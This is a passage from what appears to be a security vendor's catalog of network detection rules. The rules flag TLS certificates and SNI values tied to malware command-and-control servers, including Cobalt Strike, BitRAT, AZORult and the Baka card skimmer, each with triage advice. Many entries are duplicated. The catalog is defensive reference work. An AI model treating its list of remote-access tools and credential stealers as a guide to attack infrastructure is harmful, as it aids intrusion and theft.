This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) in SNI 2019-09-27

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS Client Hello whose Server Name Indication (SNI) extension names a host that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. Unlike the certificate-based variants of this rule, it matches the hostname the client requests rather than the certificate the server returns, so it fires at the start of the handshake, before the server's certificate is seen, and regardless of which certificate the server presents.

Recommendation

Review the alert in question: confirm that the SNI and destination recorded in the alert correspond to the indicator, bearing in mind that a client can send any SNI value, then check the source host for the malware named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Baka Skimmer Staging CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the staging and command-and-control infrastructure of the Baka card skimmer. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate. Baka is a browser-side skimmer injected into compromised checkout pages, so the session may originate from a user's browser loading such a page rather than from malware on the host; identify the site being visited and review any payment details the user entered there. If the host itself is found to be compromised, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bancos Variant CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the command-and-control infrastructure of a Bancos banking-trojan variant. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BazaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BazaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BazaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BazaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the Bazar backdoor. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the Bazar backdoor. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the Bazar backdoor. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BitRAT. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BitRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BitRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Blackrota)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the Blackrota backdoor. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (BrushaLoader CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to BrushaLoader command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (chMiner/RAT)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to chMiner/RAT. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Group/More_Eggs CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to the More_eggs command-and-control infrastructure used by the Cobalt Group. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to a Cobalt Strike team server. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Cobalt Strike command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, and check whether an authorized red-team engagement is using Cobalt Strike against this host, since the framework is used by both criminal actors and sanctioned testers. If the activity is not sanctioned, treat the host as compromised: rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike Malleable C2 Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobInt CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CONFUCIOUS_B CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CopperStealer CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CoreBot C2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CoreDn/BLINDINGCAN Activity)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CryptoMimic Staging CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (DeadlyKiss APT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Donot Group/APT-C-35 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup FireStarter CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup/Patchwork CnC)

Description

